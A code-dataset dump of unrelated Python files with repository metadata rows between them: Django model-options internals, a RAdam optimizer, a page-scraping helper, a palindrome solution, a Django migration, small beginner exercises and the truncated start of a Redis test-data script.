already_created = [fld for fld in self.local_fields if fld.name == field.name]
if already_created:
field = already_created[0]
field.primary_key = True
self.setup_pk(field)
else:
auto = AutoField(verbose_name='ID', primary_key=True, auto_created=True)
model.add_to_class('id', auto)
def add_manager(self, manager):
self.local_managers.append(manager)
self._expire_cache()
def add_field(self, field, private=False):
# Insert the given field in the order in which it was created, using
# the "creation_counter" attribute of the field.
# Move many-to-many related fields from self.fields into
# self.many_to_many.
if private:
self.private_fields.append(field)
elif field.is_relation and field.many_to_many:
bisect.insort(self.local_many_to_many, field)
else:
bisect.insort(self.local_fields, field)
self.setup_pk(field)
# If the field being added is a relation to another known field,
# expire the cache on this field and the forward cache on the field
# being referenced, because there will be new relationships in the
# cache. Otherwise, expire the cache of references *to* this field.
# The mechanism for getting at the related model is slightly odd -
# ideally, we'd just ask for field.related_model. However, related_model
# is a cached property, and all the models haven't been loaded yet, so
# we need to make sure we don't cache a string reference.
if field.is_relation and hasattr(field.remote_field, 'model') and field.remote_field.model:
try:
field.remote_field.model._meta._expire_cache(forward=False)
except AttributeError:
pass
self._expire_cache()
else:
self._expire_cache(reverse=False)
def setup_pk(self, field):
if not self.pk and field.primary_key:
self.pk = field
field.serialize = False
def setup_proxy(self, target):
"""
Do the internal setup so that the current model is a proxy for
"target".
"""
self.pk = target._meta.pk
self.proxy_for_model = target
self.db_table = target._meta.db_table
def __repr__(self):
return '<Options for %s>' % self.object_name
def __str__(self):
return self.label_lower
def can_migrate(self, connection):
"""
Return True if the model can/should be migrated on the `connection`.
`connection` can be either a real connection or a connection alias.
"""
if self.proxy or self.swapped or not self.managed:
return False
if isinstance(connection, str):
connection = connections[connection]
if self.required_db_vendor:
return self.required_db_vendor == connection.vendor
if self.required_db_features:
return all(getattr(connection.features, feat, False)
for feat in self.required_db_features)
return True
@property
def verbose_name_raw(self):
"""Return the untranslated verbose name."""
with override(None):
return str(self.verbose_name)
@property
def swapped(self):
"""
Has this model been swapped out for another? If so, return the model
name of the replacement; otherwise, return None.
For historical reasons, model name lookups using get_model() are
case insensitive, so we make sure we are case insensitive here.
"""
if self.swappable:
swapped_for = getattr(settings, self.swappable, None)
if swapped_for:
try:
swapped_label, swapped_object = swapped_for.split('.')
except ValueError:
# setting not in the format app_label.model_name
# raising ImproperlyConfigured here causes problems with
# test cleanup code - instead it is raised in get_user_model
# or as part of validation.
return swapped_for
if '%s.%s' % (swapped_label, swapped_object.lower()) != self.label_lower:
return swapped_for
return None
@cached_property
def managers(self):
managers = []
seen_managers = set()
bases = (b for b in self.model.mro() if hasattr(b, '_meta'))
for depth, base in enumerate(bases):
for manager in base._meta.local_managers:
if manager.name in seen_managers:
continue
manager = copy.copy(manager)
manager.model = self.model
seen_managers.add(manager.name)
managers.append((depth, manager.creation_counter, manager))
return make_immutable_fields_list(
"managers",
(m[2] for m in sorted(managers)),
)
@cached_property
def managers_map(self):
return {manager.name: manager for manager in self.managers}
@cached_property
def base_manager(self):
base_manager_name = self.base_manager_name
if not base_manager_name:
# Get the first parent's base_manager_name if there's one.
for parent in self.model.mro()[1:]:
if hasattr(parent, '_meta'):
if parent._base_manager.name != '_base_manager':
base_manager_name = parent._base_manager.name
break
if base_manager_name:
try:
return self.managers_map[base_manager_name]
except KeyError:
raise ValueError(
"%s has no manager named %r" % (
self.object_name,
base_manager_name,
)
)
manager = Manager()
manager.name = '_base_manager'
manager.model = self.model
manager.auto_created = True
return manager
@cached_property
def default_manager(self):
default_manager_name = self.default_manager_name
if not default_manager_name and not self.local_managers:
# Get the first parent's default_manager_name if there's one.
for parent in self.model.mro()[1:]:
if hasattr(parent, '_meta'):
default_manager_name = parent._meta.default_manager_name
break
if default_manager_name:
try:
return self.managers_map[default_manager_name]
except KeyError:
raise ValueError(
"%s has no manager named %r" % (
self.object_name,
default_manager_name,
)
)
if self.managers:
return self.managers[0]
@cached_property
def fields(self):
"""
Return a list of all forward fields on the model and its parents,
excluding ManyToManyFields.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this field list.
"""
# For legacy reasons, the fields property should only contain forward
# fields that are not private or with a m2m cardinality. Therefore we
# pass these three filters as filters to the generator.
# The third lambda is a longwinded way of checking f.related_model - we don't
# use that property directly because related_model is a cached property,
# and all the models may not have been loaded yet; we don't want to cache
# the string reference to the related_model.
def is_not_an_m2m_field(f):
return not (f.is_relation and f.many_to_many)
def is_not_a_generic_relation(f):
return not (f.is_relation and f.one_to_many)
def is_not_a_generic_foreign_key(f):
return not (
f.is_relation and f.many_to_one and not (hasattr(f.remote_field, 'model') and f.remote_field.model)
)
return make_immutable_fields_list(
"fields",
(f for f in self._get_fields(reverse=False)
if is_not_an_m2m_field(f) and is_not_a_generic_relation(f) and is_not_a_generic_foreign_key(f))
)
@cached_property
def concrete_fields(self):
"""
Return a list of all concrete fields on the model and its parents.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this field list.
"""
return make_immutable_fields_list(
"concrete_fields", (f for f in self.fields if f.concrete)
)
@cached_property
def local_concrete_fields(self):
"""
Return a list of all concrete fields on the model.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this field list.
"""
return make_immutable_fields_list(
"local_concrete_fields", (f for f in self.local_fields if f.concrete)
)
@cached_property
def many_to_many(self):
"""
Return a list of all many to many fields on the model and its parents.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this list.
"""
return make_immutable_fields_list(
"many_to_many",
(f for f in self._get_fields(reverse=False) if f.is_relation and f.many_to_many)
)
@cached_property
def related_objects(self):
"""
Return all related objects pointing to the current model. The related
objects can come from a one-to-one, one-to-many, or many-to-many field
relation type.
Private API intended only to be used by Django itself; get_fields()
combined with filtering of field properties is the public API for
obtaining this field list.
"""
all_related_fields = self._get_fields(forward=False, reverse=True, include_hidden=True)
return make_immutable_fields_list(
"related_objects",
(obj for obj in all_related_fields if not obj.hidden or obj.field.many_to_many)
)
@cached_property
def _forward_fields_map(self):
res = {}
fields = self._get_fields(reverse=False)
for field in fields:
res[field.name] = field
# Due to the way Django's internals work, get_field() should also
# be able to fetch a field by attname. In the case of a concrete
# field with relation, includes the *_id name too
try:
res[field.attname] = field
except AttributeError:
pass
return res
@cached_property
def fields_map(self):
res = {}
fields = self._get_fields(forward=False, include_hidden=True)
for field in fields:
res[field.name] = field
# Due to the way Django's internals work, get_field() should also
# be able to fetch a field by attname. In the case of a concrete
# field with relation, includes the *_id name too
try:
res[field.attname] = field
except AttributeError:
pass
return res
def get_field(self, field_name):
"""
Return a field instance given the name of a forward or reverse field.
"""
try:
# In order to avoid premature loading of the relation tree
# (expensive) we prefer checking if the field is a forward field.
return self._forward_fields_map[field_name]
except KeyError:
# If the app registry is not ready, reverse fields are
# unavailable, therefore we throw a FieldDoesNotExist exception.
if not self.apps.models_ready:
raise FieldDoesNotExist(
"%s has no field named '%s'. The app cache isn't ready yet, "
"so if this is an auto-created related field, it won't "
"be available yet." % (self.object_name, field_name)
)
try:
# Retrieve field instance by name from cached or just-computed
# field map.
return self.fields_map[field_name]
except KeyError:
raise FieldDoesNotExist("%s has no field named '%s'" % (self.object_name, field_name))
def get_base_chain(self, model):
"""
Return a list of parent classes leading to `model` (ordered from
closest to most distant ancestor). This has to handle the case where
`model` is a grandparent or even more distant relation.
"""
if not self.parents:
return []
if model in self.parents:
return [model]
for parent in self.parents:
res = parent._meta.get_base_chain(model)
if res:
res.insert(0, parent)
return res
return []
def get_parent_list(self):
"""
Return all the ancestors of this model as a list ordered by MRO.
Useful for determining if something is an ancestor, regardless of lineage.
"""
result = OrderedSet(self.parents)
for parent in self.parents:
for ancestor in parent._meta.get_parent_list():
result.add(ancestor)
return list(result)
def get_ancestor_link(self, ancestor):
"""
Return the field on the current model which points to the given
"ancestor". This is possible an indirect link (a pointer to a parent
model, which points, eventually, to the ancestor). Used when
constructing table joins for model inheritance.
Return None if the model isn't an ancestor of this one.
"""
if ancestor in self.parents:
return self.parents[ancestor]
for parent in self.parents:
# Tries to get a link field from the immediate parent
parent_link = parent._meta.get_ancestor_link(ancestor)
if parent_link:
# In case of a proxied model, the first link
# of the chain to the ancestor is that parent
# links
return self.parents[parent] or parent_link
def get_path_to_parent(self, parent):
"""
Return a list of PathInfos containing the path from the current
model to the parent model, or an empty list if parent is not a
parent of the current model.
"""
if self.model is parent:
return []
# Skip the chain of proxy to the concrete proxied model.
proxied_model = self.concrete_model
path = []
opts = self
for int_model in self.get_base_chain(parent):
if int_model is proxied_model:
opts = int_model._meta
else:
final_field = opts.parents[int_model]
targets = (final_field.remote_field.get_related_field(),)
opts = int_model._meta
path.append(PathInfo(
from_opts=final_field.model._meta,
to_opts=opts,
target_fields=targets,
join_field=final_field,
m2m=False,
direct=True,
filtered_relation=None,
))
return path
def get_path_from_parent(self, parent):
"""
Return a list of PathInfos containing the path from the parent
model to the current model, or an empty list if parent is not a
parent of the current model.
"""
if self.model is parent:
return []
model = self.concrete_model
# Get a reversed base chain including both the current and parent
# models.
chain = model._meta.get_base_chain(parent)
chain.reverse()
chain.append(model)
# Construct a list of the PathInfos between models in chain.
path = []
for i, ancestor in enumerate(chain[:-1]):
child = chain[i + 1]
link = child._meta.get_ancestor_link(ancestor)
path.extend(link.get_reverse_path_info())
return path
def _populate_directed_relation_graph(self):
"""
This method is used by each model to find its reverse objects. As this
method is very expensive and is accessed frequently (it looks up every
field in a model, in every app), it is computed on first access and then
is set as a property on every model.
"""
related_objects_graph = defaultdict(list)
all_models = self.apps.get_models(include_auto_created=True)
for model in all_models:
opts = model._meta
# Abstract model's fields are copied to child models, hence we will
# see the fields from the child models.
if opts.abstract:
continue
fields_with_relations = (
f for f in opts._get_fields(reverse=False, include_parents=False)
if f.is_relation and f.related_model is not None
)
for f in fields_with_relations:
if not isinstance(f.remote_field.model, str):
remote_label = f.remote_field.model._meta.concrete_model._meta.label
related_objects_graph[remote_label].append(f)
for model in all_models:
# Set the relation_tree using the internal __dict__. In this way
# we avoid calling the cached property. In attribute lookup,
# __dict__ takes precedence over a data descriptor (such as
# @cached_property). This means that the _meta._relation_tree is
# only called if related_objects is not in __dict__.
related_objects = related_objects_graph[model._meta.concrete_model._meta.label]
model._meta.__dict__['_relation_tree'] = related_objects
# It seems it is possible that self is not in all_models, so guard
# against that with default for get().
return self.__dict__.get('_relation_tree', EMPTY_RELATION_TREE)
@cached_property
def _relation_tree(self):
return self._populate_directed_relation_graph()
def _expire_cache(self, forward=True, reverse=True):
# This method is usually called by apps.cache_clear(), when the
# registry is finalized, or when a new field is added.
if forward:
for cache_key in self.FORWARD_PROPERTIES:
if cache_key in self.__dict__:
delattr(self, cache_key)
if reverse and not self.abstract:
for cache_key in self.REVERSE_PROPERTIES:
if cache_key in self.__dict__:
delattr(self, cache_key)
self._get_fields_cache = {}
def get_fields(self, include_parents=True, include_hidden=False):
"""
Return a list of fields associated to the model. By default, include
forward and reverse fields, fields derived from inheritance, but not
hidden fields. The returned fields can be changed using the parameters:
- include_parents: include fields derived from inheritance
- include_hidden: include fields that have a related_name that
starts with a "+"
"""
if include_parents is False:
include_parents = PROXY_PARENTS
return self._get_fields(include_parents=include_parents, include_hidden=include_hidden)
def _get_fields(self, forward=True, reverse=True, include_parents=True, include_hidden=False,
seen_models=None):
"""
Internal helper function to return fields of the model.
* If forward=True, then fields defined on this model are returned.
* If reverse=True, then relations pointing to this model are returned.
* If include_hidden=True, then fields with is_hidden=True are returned.
* The include_parents argument toggles if fields from parent models
should be included. It has three values: True, False, and
PROXY_PARENTS. When set to PROXY_PARENTS, the call will return all
fields defined for the current model or any of its parents in the
parent chain to the model's concrete model.
"""
if include_parents not in (True, False, PROXY_PARENTS):
raise TypeError("Invalid argument for include_parents: %s" % (include_parents,))
# This helper function is used to allow recursion in ``get_fields()``
# implementation and to provide a fast way for Django's internals to
# access specific subsets of fields.
# We must keep track of which models we have already seen. Otherwise we
# could include the same field multiple times from different models.
topmost_call = seen_models is None
if topmost_call:
seen_models = set()
seen_models.add(self.model)
# Creates a cache key composed of all arguments
cache_key = (forward, reverse, include_parents, include_hidden, topmost_call)
try:
# In order to avoid list manipulation. Always return a shallow copy
# of the results.
return self._get_fields_cache[cache_key]
except KeyError:
pass
fields = []
# Recursively call _get_fields() on each parent, with the same
# options provided in this call.
if include_parents is not False:
for parent in self.parents:
# In diamond inheritance it is possible that we see the same
# model from two different routes. In that case, avoid adding
# fields from the same parent again.
if parent in seen_models:
continue
if (parent._meta.concrete_model != self.concrete_model and
include_parents == PROXY_PARENTS):
continue
for obj in parent._meta._get_fields(
forward=forward, reverse=reverse, include_parents=include_parents,
include_hidden=include_hidden, seen_models=seen_models):
if not getattr(obj, 'parent_link', False) or obj.model == self.concrete_model:
fields.append(obj)
if reverse and not self.proxy:
# Tree is computed once and cached until the app cache is expired.
# It is composed of a list of fields pointing to the current model
# from other models.
all_fields = self._relation_tree
for field in all_fields:
# If hidden fields should be included or the relation is not
# intentionally hidden, add to the fields dict.
if include_hidden or not field.remote_field.hidden:
fields.append(field.remote_field)
if forward:
fields += self.local_fields
fields += self.local_many_to_many
# Private fields are recopied to each child model, and they get a
# different model as field.model in each child. Hence we have to
# add the private fields separately from the topmost call. If we
# did this recursively similar to local_fields, we would get field
# instances with field.model != self.model.
if topmost_call:
fields += self.private_fields
# In order to avoid list manipulation. Always
# return a shallow copy of the results
fields = make_immutable_fields_list("get_fields()", fields)
# Store result into cache for later access
self._get_fields_cache[cache_key] = fields
return fields
@cached_property
def total_unique_constraints(self):
"""
Return a list of total unique constraints. Useful for determining set
of fields guaranteed to be unique for all rows.
"""
return [
constraint
for constraint in self.constraints
if isinstance(constraint, UniqueConstraint) and constraint.condition is None
]
@cached_property
def _property_names(self):
"""Return a set of the names of the properties defined on the model."""
names = []
for name in dir(self.model):
attr = inspect.getattr_static(self.model, name)
if isinstance(attr, property):
names.append(name)
return frozenset(names)
@cached_property
def db_returning_fields(self):
"""
Private API intended only to be used by Django itself.
Fields to be returned after a database insert.
"""
return [
field for field in self._get_fields(forward=True, reverse=False, include_parents=PROXY_PARENTS)
if getattr(field, 'db_returning', False)
]
|
[
"1598214715@qq.com"
] |
1598214715@qq.com
|
86bd8f488e2a3f03cf11a16bb713fdcc449751ff
|
17d7ea5dcde978f054a302c039cf6d8c0f91dc89
|
/pegc/training/radam.py
|
9318174fa184699d360430631db2b528b449392c
|
[] |
no_license
|
mmikolajczak/put_emg_gestures_classification
|
194bfa0843a02f8f8058d1d5584556fc8d8aa221
|
d5b2cbe9e257f9e53e3c6d7563b9141178142e18
|
refs/heads/master
| 2021-01-05T20:04:05.552628
| 2020-02-11T18:10:25
| 2020-02-11T18:10:25
| 241,123,872
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,423
|
py
|
# Implemenatation taken from the original authors: https://github.com/LiyuanLucasLiu/RAdam
import math
import torch
from torch.optim.optimizer import Optimizer, required
class RAdam(Optimizer):
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, weight_decay=0, degenerated_to_sgd=True):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
self.degenerated_to_sgd = degenerated_to_sgd
if isinstance(params, (list, tuple)) and len(params) > 0 and isinstance(params[0], dict):
for param in params:
if 'betas' in param and (param['betas'][0] != betas[0] or param['betas'][1] != betas[1]):
param['buffer'] = [[None, None, None] for _ in range(10)]
defaults = dict(lr=lr, betas=betas, eps=eps, weight_decay=weight_decay,
buffer=[[None, None, None] for _ in range(10)])
super(RAdam, self).__init__(params, defaults)
def __setstate__(self, state):
super(RAdam, self).__setstate__(state)
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data.float()
if grad.is_sparse:
raise RuntimeError('RAdam does not support sparse gradients')
p_data_fp32 = p.data.float()
state = self.state[p]
if len(state) == 0:
state['step'] = 0
state['exp_avg'] = torch.zeros_like(p_data_fp32)
state['exp_avg_sq'] = torch.zeros_like(p_data_fp32)
else:
state['exp_avg'] = state['exp_avg'].type_as(p_data_fp32)
state['exp_avg_sq'] = state['exp_avg_sq'].type_as(p_data_fp32)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
beta1, beta2 = group['betas']
exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)
exp_avg.mul_(beta1).add_(1 - beta1, grad)
state['step'] += 1
buffered = group['buffer'][int(state['step'] % 10)]
if state['step'] == buffered[0]:
N_sma, step_size = buffered[1], buffered[2]
else:
buffered[0] = state['step']
beta2_t = beta2 ** state['step']
N_sma_max = 2 / (1 - beta2) - 1
N_sma = N_sma_max - 2 * state['step'] * beta2_t / (1 - beta2_t)
buffered[1] = N_sma
# more conservative since it's an approximated value
if N_sma >= 5:
step_size = math.sqrt(
(1 - beta2_t) * (N_sma - 4) / (N_sma_max - 4) * (N_sma - 2) / N_sma * N_sma_max / (
N_sma_max - 2)) / (1 - beta1 ** state['step'])
elif self.degenerated_to_sgd:
step_size = 1.0 / (1 - beta1 ** state['step'])
else:
step_size = -1
buffered[2] = step_size
# more conservative since it's an approximated value
if N_sma >= 5:
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
denom = exp_avg_sq.sqrt().add_(group['eps'])
p_data_fp32.addcdiv_(-step_size * group['lr'], exp_avg, denom)
p.data.copy_(p_data_fp32)
elif step_size > 0:
if group['weight_decay'] != 0:
p_data_fp32.add_(-group['weight_decay'] * group['lr'], p_data_fp32)
p_data_fp32.add_(-step_size * group['lr'], exp_avg)
p.data.copy_(p_data_fp32)
return loss
|
[
"mkm0796@gmail.com"
] |
mkm0796@gmail.com
|
60fcfc378d54ccd133e08ab358d958783eac490c
|
ca300a047dd22f16fb621997207cc62ec6b94481
|
/deployer/src/html_helper.py
|
d313af51965137e7c08954ae699d5b0cf0f17780
|
[
"MIT"
] |
permissive
|
j-low/docsearch-scraper
|
69bc3142c1a514c5007d1d24903a3ef18eaf35fc
|
95e3dbc10913e4f8d9a2e57c55be0df5055b9955
|
refs/heads/master
| 2022-12-09T21:05:19.771253
| 2018-02-11T22:48:36
| 2018-02-11T22:48:36
| 122,222,503
| 0
| 0
|
NOASSERTION
| 2022-12-08T00:40:18
| 2018-02-20T16:15:38
|
Python
|
UTF-8
|
Python
| false
| false
| 4,648
|
py
|
def get_dom_from_content(content):
from lxml import html
page = html.fromstring(content)
return page
def get_content_from_url(url):
from selenium import webdriver
import time
profile = webdriver.FirefoxProfile()
profile.set_preference('network.http.accept-encoding.secure', 'gzip, deflate')
driver = webdriver.Firefox(profile)
driver.implicitly_wait(1)
driver.get(url)
time.sleep(1)
content = driver.page_source.encode('utf-8')
driver.quit()
return content
def get_possible_main_container(url):
content = get_content_from_url(url)
page = get_dom_from_content(content)
ps = page.xpath("//p")
possible_main_container = []
for p in ps:
elt = p
elt = elt.getparent()
i = 0
while elt is not None:
if elt.tag != 'html' and (elt.tag != 'body' or i == 0):
possible_main_container.append(elt)
i +=1
elt = elt.getparent()
return set(possible_main_container)
def get_depth(div):
depth = 0
elt = div
while elt is not None:
elt = elt.getparent()
depth += 1
return depth - 1
def get_selectors(div):
id = div.get('id', None)
classes = div.get('class', None)
if div.tag in ['main', 'article', 'section']:
return div.tag
if classes is not None:
return ['.' + e.strip() for e in classes.split(' ')]
if id is not None:
return "#" + id
if div.tag != 'div':
return div.tag
return None
def get_p_count(div):
return len(div.findall('.//p'))
def get_selector_count(div):
return 0
def sort_selectors(a, b):
if a["p_count"] > b["p_count"]:
return -1
if a["p_count"] < b["p_count"]:
return 1
if a["depth"] > b["depth"]:
return -1
if a["depth"] < b["depth"]:
return 1
if isinstance(a["selector"], list) and not isinstance(b["selector"], list):
return -1
return 1
def get_eligible_divs(url):
possible_main_container = get_possible_main_container(url)
eligible_divs = []
for div in possible_main_container:
eligible_divs.append({
"depth": get_depth(div),
"selector": get_selectors(div),
"selector_count": get_selector_count(div),
"p_count": get_p_count(div),
})
#print get_selectors(div), get_p_count(div), get_depth(div)
eligible_divs = [elt for elt in eligible_divs if elt['selector'] is not None]
eligible_divs.sort(sort_selectors)
return eligible_divs
def get_main_selector_for_url(url):
eligible_divs = get_eligible_divs(url)
best_div = eligible_divs[0] if len(eligible_divs) > 0 else None
main_selector = None
if best_div is not None:
main_selector = best_div['selector']
if isinstance(main_selector, list):
if len(main_selector) == 1:
main_selector = main_selector[0]
else:
i = 1
print("Choose main selector")
for selector in main_selector:
print(str(i) + ") " + selector)
i += 1
choice = 1
try:
choice = int(raw_input(""))
if choice < 1 or choice > len(main_selector):
choice = 1
except ValueError:
pass
main_selector = main_selector[choice - 1]
return main_selector
def get_links(url, body):
from scrapy.http import HtmlResponse
from scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor
start_url = url
if '.html' in start_url:
start_url = start_url.rsplit('/', 1)[0]
response = HtmlResponse(
url=start_url,
body=body,
encoding='utf8'
)
link_extractor = LxmlLinkExtractor(
allow=[start_url],
deny=[],
tags='a',
attrs='href',
canonicalize=True
)
return link_extractor.extract_links(response)
def get_main_selector(url):
return "FIXME"
import random
from collections import Counter
content = get_content_from_url(url)
links = [link.url for link in get_links(url, content) if link.url != url and link.url + '/' != url]
if len(links) >= 3:
random.shuffle(links)
n = min(6, max(len(links), 3))
selectors = [get_main_selector_for_url(link) for link in links[:n]]
count = Counter(selectors)
selector = count.most_common()[0][0]
return selector
else:
return get_main_selector_for_url(url)
|
[
"maxiloc@gmail.com"
] |
maxiloc@gmail.com
|
1e2395c1352d22684243cbf83255cac2470bbc1a
|
d8a9b88f4087ebfe97b462e589071222e2261e47
|
/125. Valid Palindrome.py
|
d2ce188678dfc75e5a238a10d806eabd8d8cda2e
|
[] |
no_license
|
rohitpatwa/leetcode
|
a7a4e8a109ace53a38d613b5f898dd81d4771b1b
|
f4826763e8f154cac9134d53b154b8299acd39a8
|
refs/heads/master
| 2021-07-07T12:40:30.424243
| 2021-03-31T00:21:30
| 2021-03-31T00:21:30
| 235,003,084
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 849
|
py
|
# Use two pointers, one at beginning, one at end. Run 2 while loops inside a one while loop to skip all non alphanumeric charectes
class Solution(object):
def isPalindrome(self, s):
"""
:type s: str
:rtype: bool
"""
i,j = 0, len(s)-1
if not s:
return True
s = s.lower()
while True:
while i<j and not self.is_valid(s[i]):
i += 1
while i<j and not self.is_valid(s[j]):
j -= 1
if i>=j:
return True
if s[i]!=s[j]:
return False
i += 1
j -= 1
def is_valid(self, c):
if (ord(c) >= 48 and ord(c)<=57) or (ord(c) >=97 and ord(c)<=122):
return True
return False
|
[
"rohitpatwa@gmail.com"
] |
rohitpatwa@gmail.com
|
59697120b8ffbd3cedbe04dd4e2fb5090e110650
|
cc4e37f21d4141dce49dda703217a403064bac80
|
/login/migrations/0001_initial.py
|
74def4468d064ff4cd157d0f2530be8cad099521
|
[] |
no_license
|
pragyamittal0/Oxywin
|
7e28a9d8fae975f18fdc30bf1de04a71f43fad33
|
a559aff3e92981e912ebead287e17a1ec141f22d
|
refs/heads/main
| 2023-04-12T05:43:00.186149
| 2021-05-16T12:41:46
| 2021-05-16T12:41:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,779
|
py
|
# Generated by Django 3.2 on 2021-05-15 18:34
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Hospital',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=100)),
('address', models.CharField(max_length=200)),
('state', models.CharField(max_length=50)),
('pincode', models.IntegerField()),
('email', models.CharField(max_length=200)),
('storage', models.IntegerField()),
('rate', models.IntegerField()),
('available', models.IntegerField()),
('hours', models.IntegerField()),
],
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('hospital_ID', models.IntegerField()),
('vendor_ID', models.IntegerField()),
('transporter_ID', models.IntegerField()),
('quantity', models.IntegerField()),
('hours', models.IntegerField()),
('status', models.IntegerField()),
('SOS', models.IntegerField()),
],
),
migrations.CreateModel(
name='Producer',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=100)),
('address', models.CharField(max_length=200)),
('state', models.CharField(max_length=50)),
('pincode', models.IntegerField()),
('email', models.CharField(max_length=200)),
('storage', models.IntegerField()),
('rate', models.IntegerField()),
('available', models.IntegerField()),
],
),
migrations.CreateModel(
name='Transporter',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=100)),
('address', models.CharField(max_length=200)),
('state', models.CharField(max_length=50)),
('pincode', models.IntegerField()),
('email', models.CharField(max_length=200)),
('avail_tanker', models.IntegerField()),
('capacity', models.IntegerField()),
('total_tanker', models.IntegerField()),
],
),
]
|
[
"agrawalarvind00@gmail.com"
] |
agrawalarvind00@gmail.com
|
34b1942345da09183a9739296fbff2b396d196d9
|
372b868dbf2bef3122ab20f3a06561bf6204a268
|
/task5.py
|
50a55c2079c5c1dccd6cd06f717ecb566c699ecd
|
[] |
no_license
|
Bahram3110/d9_w2_t4
|
f9c84e9061316fe4db2a710bf122bc4084c82e63
|
9b15d6ef4e1e450657f84dd3d80c0879f5934aeb
|
refs/heads/master
| 2022-11-25T09:48:10.413958
| 2020-07-19T14:50:09
| 2020-07-19T14:50:09
| 280,887,021
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 457
|
py
|
input_values1 = input('Введите первое значение:')
input_values2 = input("Введите второе значение:")
input_values3 = input('Введите 3 значение:')
a = input_values1 == input_values2 and input_values1 == input_values3
b = input_values2 == input_values1 and input_values2 == input_values3
c = input_values3 == input_values1 and input_values3 == input_values2
print(a)
print(b)
print(c)
|
[
"maraimov.2309@gmail.com"
] |
maraimov.2309@gmail.com
|
a23c8576a3720335cd617ad04606132678a7e5cf
|
5cb9254e0ca1020e7487660565037e71d2a883ba
|
/build/my_robot/catkin_generated/pkg.installspace.context.pc.py
|
4c14ea9f60df354a67613cfd1035d1b0db8e5508
|
[] |
no_license
|
chinmaydas96/RBND-Where-Am-I
|
3eb3f1ea60c51b306d14a4a58cd51c203c1f7bfd
|
9375064cf9b9bc7500839be76b6f7a71b26ac59d
|
refs/heads/master
| 2022-04-25T18:45:23.394944
| 2020-04-28T06:44:51
| 2020-04-28T06:44:51
| 259,441,688
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 382
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "my_robot"
PROJECT_SPACE_DIR = "/home/robond/workspace/catkin_ws/install"
PROJECT_VERSION = "0.0.0"
|
[
"chinmaydasbat@gmail.com"
] |
chinmaydasbat@gmail.com
|
d947b4784f791c097161970c2e7ae510dc19e47c
|
de6ec270badbdd5f6914c3a477f1cab8f2db6d11
|
/PythonExercicios/ex093.py
|
5b4d1f71706227772a27ecbaa336eaf3da0d5184
|
[
"MIT"
] |
permissive
|
github-felipe/ExerciciosEmPython-cursoemvideo
|
34e5a6230ec6aa67433f231d8b93e8cf3b02e989
|
0045464a287f21b6245554a975588cf06c5b476d
|
refs/heads/main
| 2023-04-16T09:54:16.173343
| 2021-04-26T22:01:07
| 2021-04-26T22:01:07
| 312,078,038
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 851
|
py
|
jogador = {'nome': str(input('Nome: '))}
lista = list()
totGols = 0
tot = int(input('Total de partidas jogadas: '))
if tot > 0:
for partida in range(1, tot + 1):
gols = (int(input(f'Gols feitos na {partida}ª partida: ')))
lista.append(gols)
totGols += gols
jogador['gols'] = lista
jogador['totGols'] = totGols
print('-=' * 20)
print(f'Nome: {jogador["nome"]}')
if tot > 1:
contador = 0
print(f'Lista dos gols feitos: {jogador["gols"]}')
print(f'Total de gols: {jogador["totGols"]}')
print('-=' * 20)
for gol in jogador['gols']:
contador += 1
print(f'Gols feitos na {contador}ª partida: {gol}')
print(f'Foi um total de {jogador["totGols"]} gols.')
else:
print(f'Total de jogos jogados: {tot}')
print('-=' * 20)
print('Obrigado por usar o nosso programa, volte sempre!')
|
[
"felipe.lima.eu@hotmail.com"
] |
felipe.lima.eu@hotmail.com
|
ff97b2954d50623612af85b24c68f49356c68d54
|
852bfc2c22d8f59e029c6a09f6ca8d01570729af
|
/generate_cases.py
|
95efda5d29221d7850a30d25f7cc32e18fc83ce7
|
[] |
no_license
|
Redislabs-Solution-Architects/redisaml
|
7c4cac467417ce834bc5e86edd9d538e8a9e95d2
|
db71250e09d79c35361fa6837e619c2f9edb8f01
|
refs/heads/master
| 2023-06-22T19:41:18.808583
| 2021-07-23T13:52:23
| 2021-07-23T13:52:23
| 330,031,028
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,338
|
py
|
from redis import Redis
from redis.exceptions import ResponseError,ConnectionError
from os import environ,urandom,fork
from uuid import uuid1,uuid4
import random
from time import sleep
from logging import debug, info
from faker import Faker
import json
import itertools
'''
